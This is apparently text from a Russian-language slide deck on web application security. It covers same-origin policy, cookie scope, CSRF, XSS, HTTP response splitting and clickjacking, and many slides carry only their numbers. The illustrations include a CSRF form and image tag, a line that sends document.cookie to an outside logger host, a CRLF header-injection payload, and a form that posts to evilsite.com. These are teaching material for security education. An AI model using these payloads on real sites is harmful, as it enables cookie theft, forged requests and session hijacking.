2. 2

3. -
Браузер
Место положения
Открытые сессии
Пользователь
3

4. PROTOCOL://DOMAIN:port
Одинаковый источник:
http://example.com/
http://example.com/folder/
Разный источник:
http://example.com/
https://example.com/
http://test.example.com/
http://example.com:8080/
http://othersample.com/
4

5. http://kiwi.com/test_restrict.html
5

6. http://kiwi.com/test_restrict.html
6

7. http://kiwi.com/test_restrict.html
7

8. http://kiwi.com/test_restrict.html
8

9. http://kiwi.com/test_restrict.html
http://kiwi.com/src_restrict.html
9

10. http://www.kiwi.com/test_restrict.html
10

11. XMLHttpRequest
-
Метод запроса
Заголовок запроса
Чтение заголовков
Чтение ответа
11

12. ограничения:
- время жизни (expires,max-age)
- локация (path, domain)
- дополнительные аттрибуты (httponly, secure)
..domain=.target.com – любой поддомен target.com
12

13. 13

14. link
code
req1
req2
14

15. …
<img src=‘http://target.com/killme?id=1’>
…
…
<form action=‘http://target.com/killme’>
<input type=hidden name=id value=1>
</form>
…
<script>submitForm()</script>
15

16. link
link
Injected responce
16

17. 17

18. 18

19. 19

20. 20

21. 21

22. document.write()
document.writeln()
eval()
.innerHTML
etc
flash:
getURL(_root.param,”_blank”)
22

23. …
new Image().src="http://logger.com/?c="+encodeURI(document.cookie);
…
23

24. 24

25. 25

26. 26

27. 27

28. 28

29. http://target.com?jump=<user input>
…
Location: <user input>
…
http://target.com?jump=hell%0d%0aSet-Cookie: gotohell%3d1
…
Location: hell
Set-Cookie: gotohell=1
…
29

30. 30

31. Split (target.com/somevuln/)
target.com
target (target.com/admin/)
31

32. Split (target.com/somevuln/)
target.com
target (target.com/admin/)
32

33. target.com
33

34. target.com
Fake target (target.com/admin/)
…
<form action=“evilsite.com”>
…
34

35. Upgrade
Upgrade
35

36. 36

37. ...style='position:absolute;
left:0px;
top:0px;
z-index:10000;'...
37

38. 38